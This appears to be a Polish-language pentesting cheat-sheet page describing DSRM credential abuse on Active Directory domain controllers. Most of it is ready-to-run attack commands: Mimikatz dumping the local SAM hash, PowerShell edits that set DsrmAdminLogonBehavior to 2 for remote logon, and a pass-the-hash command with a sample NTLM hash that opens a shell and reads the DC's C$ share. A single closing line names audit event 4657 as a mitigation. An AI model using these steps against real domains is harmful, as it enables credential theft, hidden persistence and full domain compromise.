DSRM Credentials

Istnieje konto lokalnego administratora w każdym DC. Posiadając uprawnienia administratora na tej maszynie, możesz użyć mimikatz do zrzucenia hasha lokalnego administratora. Następnie, modyfikując rejestr, możesz aktywować to hasło, aby uzyskać zdalny dostęp do tego lokalnego użytkownika administratora. Najpierw musimy zrzucić hash użytkownika lokalnego administratora w DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Następnie musimy sprawdzić, czy to konto będzie działać, a jeśli klucz rejestru ma wartość "0" lub nie istnieje, musisz ustawić go na "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Następnie, używając PTH, możesz wylistować zawartość C$ lub nawet uzyskać powłokę. Zauważ, że do utworzenia nowej sesji powershell z tym hashem w pamięci (dla PTH) "domeną" używaną jest po prostu nazwa maszyny DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Więcej informacji na ten temat: https://adsecurity.org/?p=1714 oraz https://adsecurity.org/?p=1785

Łagodzenie

• Identyfikator zdarzenia 4657 - Audyt utworzenia/zmiany HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior